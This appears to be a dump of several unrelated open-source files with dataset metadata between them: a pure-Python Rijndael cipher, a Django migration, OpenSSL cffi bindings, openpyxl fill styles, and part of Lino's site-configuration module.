[[key[4*i],key[4*i+1],key[4*i+2],key[4*i+3]] for i in range(Nk)] for i in range(Nk,Nb*(Nr+1)): temp = w[i-1] # a four byte column if (i%Nk) == 0 : temp = temp[1:]+[temp[0]] # RotWord(temp) temp = [ Sbox[byte] for byte in temp ] temp[0] ^= Rcon[i/Nk] elif Nk > 6 and i%Nk == 4 : temp = [ Sbox[byte] for byte in temp ] # SubWord(temp) w.append( [ w[i-Nk][byte]^temp[byte] for byte in range(4) ] ) return w Rcon = (0,0x01,0x02,0x04,0x08,0x10,0x20,0x40,0x80,0x1b,0x36, # note extra '0' !!! 0x6c,0xd8,0xab,0x4d,0x9a,0x2f,0x5e,0xbc,0x63,0xc6, 0x97,0x35,0x6a,0xd4,0xb3,0x7d,0xfa,0xef,0xc5,0x91) #------------------------------------- def AddRoundKey(algInstance, keyBlock): """ XOR the algorithm state with a block of key material """ for column in range(algInstance.Nb): for row in range(4): algInstance.state[column][row] ^= keyBlock[column][row] #------------------------------------- def SubBytes(algInstance): for column in range(algInstance.Nb): for row in range(4): algInstance.state[column][row] = Sbox[algInstance.state[column][row]] def InvSubBytes(algInstance): for column in range(algInstance.Nb): for row in range(4): algInstance.state[column][row] = InvSbox[algInstance.state[column][row]] Sbox = (0x63,0x7c,0x77,0x7b,0xf2,0x6b,0x6f,0xc5, 0x30,0x01,0x67,0x2b,0xfe,0xd7,0xab,0x76, 0xca,0x82,0xc9,0x7d,0xfa,0x59,0x47,0xf0, 0xad,0xd4,0xa2,0xaf,0x9c,0xa4,0x72,0xc0, 0xb7,0xfd,0x93,0x26,0x36,0x3f,0xf7,0xcc, 0x34,0xa5,0xe5,0xf1,0x71,0xd8,0x31,0x15, 0x04,0xc7,0x23,0xc3,0x18,0x96,0x05,0x9a, 0x07,0x12,0x80,0xe2,0xeb,0x27,0xb2,0x75, 0x09,0x83,0x2c,0x1a,0x1b,0x6e,0x5a,0xa0, 0x52,0x3b,0xd6,0xb3,0x29,0xe3,0x2f,0x84, 0x53,0xd1,0x00,0xed,0x20,0xfc,0xb1,0x5b, 0x6a,0xcb,0xbe,0x39,0x4a,0x4c,0x58,0xcf, 0xd0,0xef,0xaa,0xfb,0x43,0x4d,0x33,0x85, 0x45,0xf9,0x02,0x7f,0x50,0x3c,0x9f,0xa8, 0x51,0xa3,0x40,0x8f,0x92,0x9d,0x38,0xf5, 0xbc,0xb6,0xda,0x21,0x10,0xff,0xf3,0xd2, 0xcd,0x0c,0x13,0xec,0x5f,0x97,0x44,0x17, 0xc4,0xa7,0x7e,0x3d,0x64,0x5d,0x19,0x73, 0x60,0x81,0x4f,0xdc,0x22,0x2a,0x90,0x88, 0x46,0xee,0xb8,0x14,0xde,0x5e,0x0b,0xdb, 0xe0,0x32,0x3a,0x0a,0x49,0x06,0x24,0x5c, 0xc2,0xd3,0xac,0x62,0x91,0x95,0xe4,0x79, 0xe7,0xc8,0x37,0x6d,0x8d,0xd5,0x4e,0xa9, 0x6c,0x56,0xf4,0xea,0x65,0x7a,0xae,0x08, 0xba,0x78,0x25,0x2e,0x1c,0xa6,0xb4,0xc6, 0xe8,0xdd,0x74,0x1f,0x4b,0xbd,0x8b,0x8a, 0x70,0x3e,0xb5,0x66,0x48,0x03,0xf6,0x0e, 0x61,0x35,0x57,0xb9,0x86,0xc1,0x1d,0x9e, 0xe1,0xf8,0x98,0x11,0x69,0xd9,0x8e,0x94, 0x9b,0x1e,0x87,0xe9,0xce,0x55,0x28,0xdf, 0x8c,0xa1,0x89,0x0d,0xbf,0xe6,0x42,0x68, 0x41,0x99,0x2d,0x0f,0xb0,0x54,0xbb,0x16) InvSbox = (0x52,0x09,0x6a,0xd5,0x30,0x36,0xa5,0x38, 0xbf,0x40,0xa3,0x9e,0x81,0xf3,0xd7,0xfb, 0x7c,0xe3,0x39,0x82,0x9b,0x2f,0xff,0x87, 0x34,0x8e,0x43,0x44,0xc4,0xde,0xe9,0xcb, 0x54,0x7b,0x94,0x32,0xa6,0xc2,0x23,0x3d, 0xee,0x4c,0x95,0x0b,0x42,0xfa,0xc3,0x4e, 0x08,0x2e,0xa1,0x66,0x28,0xd9,0x24,0xb2, 0x76,0x5b,0xa2,0x49,0x6d,0x8b,0xd1,0x25, 0x72,0xf8,0xf6,0x64,0x86,0x68,0x98,0x16, 0xd4,0xa4,0x5c,0xcc,0x5d,0x65,0xb6,0x92, 0x6c,0x70,0x48,0x50,0xfd,0xed,0xb9,0xda, 0x5e,0x15,0x46,0x57,0xa7,0x8d,0x9d,0x84, 0x90,0xd8,0xab,0x00,0x8c,0xbc,0xd3,0x0a, 0xf7,0xe4,0x58,0x05,0xb8,0xb3,0x45,0x06, 0xd0,0x2c,0x1e,0x8f,0xca,0x3f,0x0f,0x02, 0xc1,0xaf,0xbd,0x03,0x01,0x13,0x8a,0x6b, 0x3a,0x91,0x11,0x41,0x4f,0x67,0xdc,0xea, 0x97,0xf2,0xcf,0xce,0xf0,0xb4,0xe6,0x73, 0x96,0xac,0x74,0x22,0xe7,0xad,0x35,0x85, 0xe2,0xf9,0x37,0xe8,0x1c,0x75,0xdf,0x6e, 0x47,0xf1,0x1a,0x71,0x1d,0x29,0xc5,0x89, 0x6f,0xb7,0x62,0x0e,0xaa,0x18,0xbe,0x1b, 0xfc,0x56,0x3e,0x4b,0xc6,0xd2,0x79,0x20, 0x9a,0xdb,0xc0,0xfe,0x78,0xcd,0x5a,0xf4, 0x1f,0xdd,0xa8,0x33,0x88,0x07,0xc7,0x31, 
0xb1,0x12,0x10,0x59,0x27,0x80,0xec,0x5f, 0x60,0x51,0x7f,0xa9,0x19,0xb5,0x4a,0x0d, 0x2d,0xe5,0x7a,0x9f,0x93,0xc9,0x9c,0xef, 0xa0,0xe0,0x3b,0x4d,0xae,0x2a,0xf5,0xb0, 0xc8,0xeb,0xbb,0x3c,0x83,0x53,0x99,0x61, 0x17,0x2b,0x04,0x7e,0xba,0x77,0xd6,0x26, 0xe1,0x69,0x14,0x63,0x55,0x21,0x0c,0x7d) #------------------------------------- """ For each block size (Nb), the ShiftRow operation shifts row i by the amount Ci. Note that row 0 is not shifted. Nb C1 C2 C3 ------------------- """ shiftOffset = { 4 : ( 0, 1, 2, 3), 5 : ( 0, 1, 2, 3), 6 : ( 0, 1, 2, 3), 7 : ( 0, 1, 2, 4), 8 : ( 0, 1, 3, 4) } def ShiftRows(algInstance): tmp = [0]*algInstance.Nb # list of size Nb for r in range(1,4): # row 0 reamains unchanged and can be skipped for c in range(algInstance.Nb): tmp[c] = algInstance.state[(c+shiftOffset[algInstance.Nb][r]) % algInstance.Nb][r] for c in range(algInstance.Nb): algInstance.state[c][r] = tmp[c] def InvShiftRows(algInstance): tmp = [0]*algInstance.Nb # list of size Nb for r in range(1,4): # row 0 reamains unchanged and can be skipped for c in range(algInstance.Nb): tmp[c] = algInstance.state[(c+algInstance.Nb-shiftOffset[algInstance.Nb][r]) % algInstance.Nb][r] for c in range(algInstance.Nb): algInstance.state[c][r] = tmp[c] #------------------------------------- def MixColumns(a): Sprime = [0,0,0,0] for j in range(a.Nb): # for each column Sprime[0] = mul(2,a.state[j][0])^mul(3,a.state[j][1])^mul(1,a.state[j][2])^mul(1,a.state[j][3]) Sprime[1] = mul(1,a.state[j][0])^mul(2,a.state[j][1])^mul(3,a.state[j][2])^mul(1,a.state[j][3]) Sprime[2] = mul(1,a.state[j][0])^mul(1,a.state[j][1])^mul(2,a.state[j][2])^mul(3,a.state[j][3]) Sprime[3] = mul(3,a.state[j][0])^mul(1,a.state[j][1])^mul(1,a.state[j][2])^mul(2,a.state[j][3]) for i in range(4): a.state[j][i] = Sprime[i] def InvMixColumns(a): """ Mix the four bytes of every column in a linear way This is the opposite operation of Mixcolumn """ Sprime = [0,0,0,0] for j in range(a.Nb): # for each column Sprime[0] = mul(0x0E,a.state[j][0])^mul(0x0B,a.state[j][1])^mul(0x0D,a.state[j][2])^mul(0x09,a.state[j][3]) Sprime[1] = mul(0x09,a.state[j][0])^mul(0x0E,a.state[j][1])^mul(0x0B,a.state[j][2])^mul(0x0D,a.state[j][3]) Sprime[2] = mul(0x0D,a.state[j][0])^mul(0x09,a.state[j][1])^mul(0x0E,a.state[j][2])^mul(0x0B,a.state[j][3]) Sprime[3] = mul(0x0B,a.state[j][0])^mul(0x0D,a.state[j][1])^mul(0x09,a.state[j][2])^mul(0x0E,a.state[j][3]) for i in range(4): a.state[j][i] = Sprime[i] #------------------------------------- def mul(a, b): """ Multiply two elements of GF(2^m) needed for MixColumn and InvMixColumn """ if (a !=0 and b!=0): return Alogtable[(Logtable[a] + Logtable[b])%255] else: return 0 Logtable = ( 0, 0, 25, 1, 50, 2, 26, 198, 75, 199, 27, 104, 51, 238, 223, 3, 100, 4, 224, 14, 52, 141, 129, 239, 76, 113, 8, 200, 248, 105, 28, 193, 125, 194, 29, 181, 249, 185, 39, 106, 77, 228, 166, 114, 154, 201, 9, 120, 101, 47, 138, 5, 33, 15, 225, 36, 18, 240, 130, 69, 53, 147, 218, 142, 150, 143, 219, 189, 54, 208, 206, 148, 19, 92, 210, 241, 64, 70, 131, 56, 102, 221, 253, 48, 191, 6, 139, 98, 179, 37, 226, 152, 34, 136, 145, 16, 126, 110, 72, 195, 163, 182, 30, 66, 58, 107, 40, 84, 250, 133, 61, 186, 43, 121, 10, 21, 155, 159, 94, 202, 78, 212, 172, 229, 243, 115, 167, 87, 175, 88, 168, 80, 244, 234, 214, 116, 79, 174, 233, 213, 231, 230, 173, 232, 44, 215, 117, 122, 235, 22, 11, 245, 89, 203, 95, 176, 156, 169, 81, 160, 127, 12, 246, 111, 23, 196, 73, 236, 216, 67, 31, 45, 164, 118, 123, 183, 204, 187, 62, 90, 251, 96, 177, 134, 59, 82, 161, 108, 170, 85, 41, 
157, 151, 178, 135, 144, 97, 190, 220, 252, 188, 149, 207, 205, 55, 63, 91, 209, 83, 57, 132, 60, 65, 162, 109, 71, 20, 42, 158, 93, 86, 242, 211, 171, 68, 17, 146, 217, 35, 32, 46, 137, 180, 124, 184, 38, 119, 153, 227, 165, 103, 74, 237, 222, 197, 49, 254, 24, 13, 99, 140, 128, 192, 247, 112, 7) Alogtable= ( 1, 3, 5, 15, 17, 51, 85, 255, 26, 46, 114, 150, 161, 248, 19, 53, 95, 225, 56, 72, 216, 115, 149, 164, 247, 2, 6, 10, 30, 34, 102, 170, 229, 52, 92, 228, 55, 89, 235, 38, 106, 190, 217, 112, 144, 171, 230, 49, 83, 245, 4, 12, 20, 60, 68, 204, 79, 209, 104, 184, 211, 110, 178, 205, 76, 212, 103, 169, 224, 59, 77, 215, 98, 166, 241, 8, 24, 40, 120, 136, 131, 158, 185, 208, 107, 189, 220, 127, 129, 152, 179, 206, 73, 219, 118, 154, 181, 196, 87, 249, 16, 48, 80, 240, 11, 29, 39, 105, 187, 214, 97, 163, 254, 25, 43, 125, 135, 146, 173, 236, 47, 113, 147, 174, 233, 32, 96, 160, 251, 22, 58, 78, 210, 109, 183, 194, 93, 231, 50, 86, 250, 21, 63, 65, 195, 94, 226, 61, 71, 201, 64, 192, 91, 237, 44, 116, 156, 191, 218, 117, 159, 186, 213, 100, 172, 239, 42, 126, 130, 157, 188, 223, 122, 142, 137, 128, 155, 182, 193, 88, 232, 35, 101, 175, 234, 37, 111, 177, 200, 67, 197, 84, 252, 31, 33, 99, 165, 244, 7, 9, 27, 45, 119, 153, 176, 203, 70, 202, 69, 207, 74, 222, 121, 139, 134, 145, 168, 227, 62, 66, 198, 81, 243, 14, 18, 54, 90, 238, 41, 123, 141, 140, 143, 138, 133, 148, 167, 242, 13, 23, 57, 75, 221, 124, 132, 151, 162, 253, 28, 36, 108, 180, 199, 82, 246, 1)
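#-------------------------------------
# Minimal usage sketch (not part of the original module; it assumes
# crypto.cipher.base is importable so BlockCipher.reset() is available):
# a one-block encrypt/decrypt round trip. Key and block are both 16 bytes
# here, the AES-128 shape; encryptBlock/decryptBlock operate on exactly
# blockSize bytes.
if __name__ == '__main__':
    r = Rijndael(key='0123456789abcdef', keySize=16, blockSize=16)
    ct = r.encryptBlock('sixteen byte blk') # 16-byte plaintext block
    assert r.decryptBlock(ct) == 'sixteen byte blk'
    print 'rijndael one-block round trip ok'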
mit
4,782,612,339,069,262,000
49.927336
115
0.547901
false
Ninad998/FinalYearProject
deep_stylo/migrations/0001_initial.py
1
1563
# -*- coding: utf-8 -*- # Generated by Django 1.10.6 on 2017-03-24 16:30 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Result', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('doc_id', models.IntegerField()), ('authorList', models.CharField(max_length=200)), ('predicted_author', models.CharField(max_length=200, null=True)), ('train_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)), ('validation_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)), ('test_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)), ('test_binary', models.DecimalField(decimal_places=1, max_digits=2, null=True)), ('upload_date', models.DateTimeField(default=django.utils.timezone.now)), ('status', models.DecimalField(decimal_places=1, default=0.0, max_digits=2)), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ]
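# Usage note (not part of the generated file): Django applies this initial
# migration with the standard management command, e.g.
#
#     python manage.py migrate deep_stylo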
mit
-7,605,435,888,718,739,000
42.416667
118
0.627639
false
Ayrx/cryptography
src/_cffi_src/openssl/crypto.py
1
3371
# This file is dual licensed under the terms of the Apache License, Version # 2.0, and the BSD License. See the LICENSE file in the root of this repository # for complete details. from __future__ import absolute_import, division, print_function INCLUDES = """ #include <openssl/crypto.h> """ TYPES = """ static const long Cryptography_HAS_LOCKING_CALLBACKS; static const int SSLEAY_VERSION; static const int SSLEAY_CFLAGS; static const int SSLEAY_PLATFORM; static const int SSLEAY_DIR; static const int SSLEAY_BUILT_ON; static const int OPENSSL_VERSION; static const int OPENSSL_CFLAGS; static const int OPENSSL_BUILT_ON; static const int OPENSSL_PLATFORM; static const int OPENSSL_DIR; static const int CRYPTO_MEM_CHECK_ON; static const int CRYPTO_MEM_CHECK_OFF; static const int CRYPTO_MEM_CHECK_ENABLE; static const int CRYPTO_MEM_CHECK_DISABLE; static const int CRYPTO_LOCK; static const int CRYPTO_UNLOCK; static const int CRYPTO_READ; static const int CRYPTO_LOCK_SSL; """ FUNCTIONS = """ int CRYPTO_mem_ctrl(int); int CRYPTO_is_mem_check_on(void); void CRYPTO_mem_leaks(struct bio_st *); """ MACROS = """ /* CRYPTO_cleanup_all_ex_data became a macro in 1.1.0 */ void CRYPTO_cleanup_all_ex_data(void); /* as of 1.1.0 OpenSSL does its own locking *angelic chorus*. These functions have become macros that are no ops */ int CRYPTO_num_locks(void); void CRYPTO_set_locking_callback(void(*)(int, int, const char *, int)); void (*CRYPTO_get_locking_callback(void))(int, int, const char *, int); /* SSLeay was removed in 1.1.0 */ unsigned long SSLeay(void); const char *SSLeay_version(int); /* these functions were added to replace the SSLeay functions in 1.1.0 */ unsigned long OpenSSL_version_num(void); const char *OpenSSL_version(int); /* this is a macro in 1.1.0 */ void OPENSSL_free(void *); /* This was removed in 1.1.0 */ void CRYPTO_lock(int, int, const char *, int); """ CUSTOMIZATIONS = """ /* In 1.1.0 SSLeay has finally been retired. We bidirectionally define the values so you can use either one. This is so we can use the new function names no matter what OpenSSL we're running on, but users on older pyOpenSSL releases won't see issues if they're running OpenSSL 1.1.0 */ #if !defined(SSLEAY_VERSION) # define SSLeay OpenSSL_version_num # define SSLeay_version OpenSSL_version # define SSLEAY_VERSION_NUMBER OPENSSL_VERSION_NUMBER # define SSLEAY_VERSION OPENSSL_VERSION # define SSLEAY_CFLAGS OPENSSL_CFLAGS # define SSLEAY_BUILT_ON OPENSSL_BUILT_ON # define SSLEAY_PLATFORM OPENSSL_PLATFORM # define SSLEAY_DIR OPENSSL_DIR #endif #if !defined(OPENSSL_VERSION) # define OpenSSL_version_num SSLeay # define OpenSSL_version SSLeay_version # define OPENSSL_VERSION SSLEAY_VERSION # define OPENSSL_CFLAGS SSLEAY_CFLAGS # define OPENSSL_BUILT_ON SSLEAY_BUILT_ON # define OPENSSL_PLATFORM SSLEAY_PLATFORM # define OPENSSL_DIR SSLEAY_DIR #endif #if !defined(CRYPTO_LOCK) static const long Cryptography_HAS_LOCKING_CALLBACKS = 0; static const long CRYPTO_LOCK = 0; static const long CRYPTO_UNLOCK = 0; static const long CRYPTO_READ = 0; static const long CRYPTO_LOCK_SSL = 0; void (*CRYPTO_lock)(int, int, const char *, int) = NULL; #else static const long Cryptography_HAS_LOCKING_CALLBACKS = 1; #endif """
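# Usage note (an illustration, not from this file): the bidirectional #defines
# in CUSTOMIZATIONS mean downstream code can use either naming convention
# regardless of the OpenSSL version compiled against; e.g. a hypothetical
# compiled binding handle `lib` would satisfy
#
#     lib.SSLeay() == lib.OpenSSL_version_num()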
bsd-3-clause
7,430,546,441,362,209,000
33.397959
79
0.723821
false
mfsteen/CIQTranslate-Kristian
openpyxl/styles/fills.py
1
5258
from __future__ import absolute_import # Copyright (c) 2010-2016 openpyxl from openpyxl.descriptors import Float, Set, Alias, NoneSet from openpyxl.descriptors.sequence import ValueSequence from openpyxl.compat import safe_string from .colors import ColorDescriptor, Color from .hashable import HashableObject from openpyxl.xml.functions import Element, localname, safe_iterator from openpyxl.xml.constants import SHEET_MAIN_NS FILL_NONE = 'none' FILL_SOLID = 'solid' FILL_PATTERN_DARKDOWN = 'darkDown' FILL_PATTERN_DARKGRAY = 'darkGray' FILL_PATTERN_DARKGRID = 'darkGrid' FILL_PATTERN_DARKHORIZONTAL = 'darkHorizontal' FILL_PATTERN_DARKTRELLIS = 'darkTrellis' FILL_PATTERN_DARKUP = 'darkUp' FILL_PATTERN_DARKVERTICAL = 'darkVertical' FILL_PATTERN_GRAY0625 = 'gray0625' FILL_PATTERN_GRAY125 = 'gray125' FILL_PATTERN_LIGHTDOWN = 'lightDown' FILL_PATTERN_LIGHTGRAY = 'lightGray' FILL_PATTERN_LIGHTGRID = 'lightGrid' FILL_PATTERN_LIGHTHORIZONTAL = 'lightHorizontal' FILL_PATTERN_LIGHTTRELLIS = 'lightTrellis' FILL_PATTERN_LIGHTUP = 'lightUp' FILL_PATTERN_LIGHTVERTICAL = 'lightVertical' FILL_PATTERN_MEDIUMGRAY = 'mediumGray' fills = (FILL_SOLID, FILL_PATTERN_DARKDOWN, FILL_PATTERN_DARKGRAY, FILL_PATTERN_DARKGRID, FILL_PATTERN_DARKHORIZONTAL, FILL_PATTERN_DARKTRELLIS, FILL_PATTERN_DARKUP, FILL_PATTERN_DARKVERTICAL, FILL_PATTERN_GRAY0625, FILL_PATTERN_GRAY125, FILL_PATTERN_LIGHTDOWN, FILL_PATTERN_LIGHTGRAY, FILL_PATTERN_LIGHTGRID, FILL_PATTERN_LIGHTHORIZONTAL, FILL_PATTERN_LIGHTTRELLIS, FILL_PATTERN_LIGHTUP, FILL_PATTERN_LIGHTVERTICAL, FILL_PATTERN_MEDIUMGRAY) class Fill(HashableObject): """Base class""" tagname = "fill" @classmethod def from_tree(cls, el): children = [c for c in el] if not children: return child = children[0] if "patternFill" in child.tag: return PatternFill._from_tree(child) else: return GradientFill._from_tree(child) class PatternFill(Fill): """Area fill patterns for use in styles. 
Caution: if you do not specify a fill_type, other attributes will have no effect !""" tagname = "patternFill" __fields__ = ('patternType', 'fgColor', 'bgColor') __elements__ = ('fgColor', 'bgColor') patternType = NoneSet(values=fills) fill_type = Alias("patternType") fgColor = ColorDescriptor() start_color = Alias("fgColor") bgColor = ColorDescriptor() end_color = Alias("bgColor") def __init__(self, patternType=None, fgColor=Color(), bgColor=Color(), fill_type=None, start_color=None, end_color=None): if fill_type is not None: patternType = fill_type self.patternType = patternType if start_color is not None: fgColor = start_color self.fgColor = fgColor if end_color is not None: bgColor = end_color self.bgColor = bgColor @classmethod def _from_tree(cls, el): attrib = dict(el.attrib) for child in el: desc = localname(child) attrib[desc] = Color.from_tree(child) return cls(**attrib) def to_tree(self, tagname=None): parent = Element("fill") el = Element(self.tagname) if self.patternType is not None: el.set('patternType', self.patternType) for c in self.__elements__: value = getattr(self, c) if value != Color(): el.append(value.to_tree(c)) parent.append(el) return parent DEFAULT_EMPTY_FILL = PatternFill() DEFAULT_GRAY_FILL = PatternFill(patternType='gray125') def _serialise_stop(tagname, sequence, namespace=None): for idx, color in enumerate(sequence): stop = Element("stop", position=str(idx)) stop.append(color.to_tree()) yield stop class GradientFill(Fill): tagname = "gradientFill" __fields__ = ('type', 'degree', 'left', 'right', 'top', 'bottom', 'stop') type = Set(values=('linear', 'path')) fill_type = Alias("type") degree = Float() left = Float() right = Float() top = Float() bottom = Float() stop = ValueSequence(expected_type=Color, to_tree=_serialise_stop) def __init__(self, type="linear", degree=0, left=0, right=0, top=0, bottom=0, stop=(), fill_type=None): self.degree = degree self.left = left self.right = right self.top = top self.bottom = bottom self.stop = stop if fill_type is not None: type = fill_type self.type = type def __iter__(self): for attr in self.__attrs__: value = getattr(self, attr) if value: yield attr, safe_string(value) @classmethod def _from_tree(cls, node): colors = [] for color in safe_iterator(node, "{%s}color" % SHEET_MAIN_NS): colors.append(Color.from_tree(color)) return cls(stop=colors, **node.attrib) def to_tree(self, tagname=None, namespace=None): parent = Element("fill") el = super(GradientFill, self).to_tree() parent.append(el) return parent
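# Example (illustrative, not part of this module): a solid fill built with the
# aliases defined above and assigned to a cell of some worksheet `ws`.
#
#     from openpyxl.styles import PatternFill
#     highlight = PatternFill(fill_type='solid',
#                             start_color='FFFFFF00',  # ARGB yellow
#                             end_color='FFFFFF00')
#     ws['A1'].fill = highlight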
gpl-3.0
-6,165,026,717,945,432,000
29.218391
86
0.63294
false
MaxTyutyunnikov/lino
lino/lino_site.py
1
69806
# -*- coding: UTF-8 -*- ## Copyright 2002-2013 Luc Saffre ## This file is part of the Lino project. ## Lino is free software; you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation; either version 3 of the License, or ## (at your option) any later version. ## Lino is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## You should have received a copy of the GNU General Public License ## along with Lino; if not, see <http://www.gnu.org/licenses/>. """ This defines the :class:`Site` class. It has a lot of class attributes which may be overridden by the application developer and/or the local site administrator. Here is a list of Lino-specific settings. The settings inherited :class:`north.north_site.Site` and :class:`djangosite.Site` are documented there. .. setting:: config_id The primary key of the one and only `SiteConfig` instance of this SITE. Default value is 1. This is Lino's equivalent of Django's :setting:`SITE_ID` setting. Lino applications don't need ``django.contrib.sites`` (`The "sites" framework <https://docs.djangoproject.com/en/dev/ref/contrib/sites/>`_) because this functionality is integral part of :mod:`lino.modlib.system`. .. setting:: use_davlink Set this to `True` if this site should feature WebDAV-enabled links using :ref:`davlink`. .. setting:: use_eidreader No longer used. Replaced by :class:`lino.mixins.beid.BeIdReaderPlugin`. Set this to `True` if this site should feature using :ref:`eidreader`. .. setting:: auto_configure_logger_names A string with a space-separated list of logger names to be automatically configured. See :mod:`lino.utils.log`. .. setting:: user_model Set this to ``"users.User"`` if you use `lino.modlib.users`. Default value us `None`, meaning that this site has no user management (feature used by e.g. :mod:`lino.test_apps.1`) Set this to ``"auth.User"`` if you use `django.contrib.auth` instead of `lino.modlib.users` (not tested). .. setting:: remote_user_header The name of the header (set by the web server) that Lino should consult for finding the user of a request. The default value `None` means that http authentication is not used. Apache's default value is ``"REMOTE_USER"``. .. setting:: ldap_auth_server This should be a string with the domain name and DNS (separated by a space) of the LDAP server to be used for authentication. Example:: ldap_auth_server = 'DOMAIN_NAME SERVER_DNS' .. setting:: auth_middleware Override used Authorisation middlewares with supplied tuple of middleware class names. If None, use logic described in :doc:`/topics/auth` .. setting:: project_model Optionally set this to the <applabel.modelname> of a model used as "central project" in your application. Which concretely means that certain other models like notes.Note, outbox.Mail, ... have an additional foreignkey to this model. Not yet decided whther this makes sense. It is probably an obsolete pattern. .. setting:: admin_prefix The prefix to use for Lino "admin mode" (i.e. the "admin main page" with a pull-down "main menu"). The default value is an empty string, resulting in a website whose root url shows the admin mode. Note that unlike Django's `MEDIA_URL <https://docs.djangoproject.com/en/dev/ref/settings/#media-url>`__ setting, this must not contain any slash. 
If this is nonempty, then your site features a "web content mode": the root url renders "web content" defined by :mod:`lino.modlib.pages`. The usual value in that case is ``admin_prefix = "admin"``. See also - `telling Django to recognize a different application root url <http://groups.google.com/group/django-users/browse_thread/thread/c95ba83e8f666ae5?pli=1>`__ - `How to get site's root path in Django <http://groups.google.com/group/django-users/browse_thread/thread/27f035aa8e566af6>`__ - `#8906 django.contrib.auth settings.py URL's aren't portable <https://code.djangoproject.com/ticket/8906>`__ - `Changed the way URL paths are determined <https://code.djangoproject.com/wiki/BackwardsIncompatibleChanges#ChangedthewayURLpathsaredetermined>`__ .. setting:: plain_prefix The prefix to use for "plain html" URLs. Default value is ``'plain'``. Exactly one of :setting:`admin_prefix` and :setting:`plain_prefix` must be empty. .. setting:: preview_limit Default value for the :attr:`preview_limit <lino.core.tables.AbstractTable.preview_limit>` parameter of all tables who don't specify their own one. Default value is 15. .. setting:: calendar_start_hour The time at which the CalendarPanel's daily view starts. Used when :setting:`use_extensible` is True. .. setting:: calendar_end_hour The time at which the CalendarPanel's daily view ends. Used when :setting:`use_extensible` is True. .. setting:: start_year An integer with the calendar year in which this site starts working. Used e.g. by :mod:`lino.modlib.ledger.utils` to fill the default list of FixcalYears. Or by :mod:`lino.modlib.ledger.fixtures.mini` to generate demo invoices. .. setting:: setup_choicelists Redefine application-specific Choice Lists. Especially used to define application-specific :class:`UserProfiles <lino.core.perms.UserProfiles>`. Lino by default has two user profiles "User" and "Administrator", defined in :mod:`lino.core.perms`. Application developers who use group-based requirements must override this in their application's :xfile:`settings.py` to provide a default list of user profiles for their application. See the source code of :mod:`lino.projects.presto` or :mod:`lino.projects.pcsw` for a usage example. Local site administrators may again override this in their :xfile:`settings.py`. Note that you may not specify values longer than `max_length` when redefining your choicelists. This limitation is because these redefinitions happen at a moment where database fields have already been instantiated, so it is too late to change their max_length. Not that this limitation is only for the *values*, not for the names or texts of choices. .. setting:: get_installed_apps This method is expected to yield the list of strings to be stored into Django's :setting:`INSTALLED_APPS` setting. """ from __future__ import unicode_literals import logging logger = logging.getLogger(__name__) import os from os.path import join, abspath, dirname, normpath, isdir, exists import sys import cgi import inspect import datetime from decimal import Decimal from urllib import urlencode from pkg_resources import Requirement, resource_filename, DistributionNotFound from lino.utils.xmlgen import html as xghtml from lino.utils import AttrDict #~ from lino import SETUP_INFO from django.utils.translation import ugettext_lazy as _ from north import Site import lino from lino import ad from lino.utils.xmlgen.html import E class Site(Site): """ This is the base for every Lino Site. 
""" config_id = 1 preview_limit = 15 calendar_start_hour = 8 calendar_end_hour = 18 override_modlib_models = set() "See :attr:`lino.site.Site.override_modlib_models`." textfield_format = 'plain' """ The default format for text fields. Valid choices are currently 'plain' and 'html'. Text fields are either Django's `models.TextField` or :class:`lino.fields.RichTextField`. You'll probably better leave the global option as 'plain', and specify explicitly the fields you want as html by declaring them:: foo = fields.RichTextField(...,format='html') We even recommend that you declare your *plain* text fields also using `fields.RichTextField` and not `models.TextField`:: foo = fields.RichTextField() Because that gives subclasses of your application the possibility to make that specific field html-formatted:: resolve_field('Bar.foo').set_format('html') """ help_url = "http://code.google.com/p/lino" #~ site_url = #~ index_html = "This is the main page." #~ title = None title = "Unnamed Lino site" #~ domain = "www.example.com" catch_layout_exceptions = True """ Lino usually catches any exception during :meth:`lino.ui.extjs3.ExtUI.create_layout_element` to report errors of style "Unknown element "postings.PostingsByController ('postings')" referred in layout <PageDetail on pages.Pages>." Setting this to `False` is useful when there's some problem *within* the framework. """ #~ preferred_build_method = 'pisa' #~ preferred_build_method = 'appypdf' csv_params = dict() """ Site-wide default parameters for CSV generation. This must be a dictionary that will be used as keyword parameters to Python `csv.writer() <http://docs.python.org/library/csv.html#csv.writer>`_ Possible keys include: - encoding : the charset to use when responding to a CSV request. See http://docs.python.org/library/codecs.html#standard-encodings for a list of available values. - many more allowed keys are explained in `Dialects and Formatting Parameters <http://docs.python.org/library/csv.html#csv-fmt-params>`_. """ auto_configure_logger_names = 'djangosite north lino' appy_params = dict(ooPort=8100) """ Used by :class:`lino.mixins.printable.AppyBuildMethod`. """ modules = AttrDict() # this is explained in the polls tutorial # cannot use autodoc for this attribute # because autodoc shows the "default" value #~ decimal_separator = '.' decimal_separator = ',' """ Set this to either ``'.'`` or ``','`` to define wether to use comma or dot as decimal point separator when entering a `DecimalField`. """ #~ decimal_group_separator = ',' decimal_group_separator = ' ' """ Decimal group separator for :func:`lino.utils.moneyfmt`. """ time_format_strftime = '%H:%M' """ Format (in strftime syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_time`. """ date_format_strftime = '%d.%m.%Y' """ Format (in strftime syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_date`. """ #~ date_format_regex = "/^[0123]\d\.[01]\d\.-?\d+$/" date_format_regex = "/^[0123]?\d\.[01]?\d\.-?\d+$/" """ Format (in Javascript regex syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_date`. """ datetime_format_strftime = '%Y-%m-%dT%H:%M:%S' """ Format (in strftime syntax) to use for formatting timestamps in AJAX responses. If you change this setting, you also need to override :meth:`parse_datetime`. 
